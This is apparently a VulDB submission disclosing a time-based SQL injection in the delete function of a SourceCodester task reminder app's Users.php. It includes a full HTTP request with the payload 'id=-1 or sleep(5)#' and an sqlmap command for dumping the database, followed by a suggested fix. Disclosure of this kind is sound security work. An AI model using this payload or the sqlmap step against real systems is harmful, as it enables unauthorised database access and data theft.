Submit #229400: SourceCodester Task Management System POST sql injection in Users.php info

TitleSourceCodester Task Management System POST sql injection in Users.php
DescriptionI find a SQL injection vulnerability in the SourceCodester Task Management System(https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html) POST /php-trs/classes/Users.php?f=delete HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 18 Origin: http://localhost Connection: close Referer: http://localhost/php-trs/admin/?page=user/list Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=34ls3fdfoq2kd1sevq1fr3pg68 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin id=-1 or sleep(5)# Then you will feel that the server's response time has obviously become longer, and this proves that our sql statement was successfully executed. Then you can save the request package as 1.txt, and then use sqlmap to inject it. The command is "sqlmap -r 1.txt --data="id=-1", and then you can successfully drag the library The vulnerability stems from not adequately filtering the controllable parameter id when using the code "UPDATE users set data where id = {id}'". This oversight leaves the system open to potential SQL injection attacks. To rectify this issue, I suggest safeguarding the id parameter against malicious exploitation through the use of mysqli_real_escape_string().
Source⚠️ https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html
User
 susu2023 (UID 57300)
Submission10/28/2023 04:41 (3 years ago)
Moderation10/28/2023 08:26 (4 hours later)
StatusAccepted
VulDB entry243800 [SourceCodester Task Reminder System 1.0 Users.php?f=delete ID sql injection]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!